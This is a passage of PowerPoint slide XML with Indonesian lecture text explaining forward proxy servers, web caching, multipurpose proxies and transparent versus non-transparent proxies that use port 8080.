              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>muatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Server Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terusan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proxy forward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proxy web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web di Internet. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port TCP 80 dan 443 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Manfaat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server proxy web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> caching, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di proxy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniadakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilayaninya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proxy web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP, dan, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web juga. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multiguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multiguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data web, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer file, dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proxy yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server proxy dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konvensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, port di mana server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port TCP/8080.</a:t>
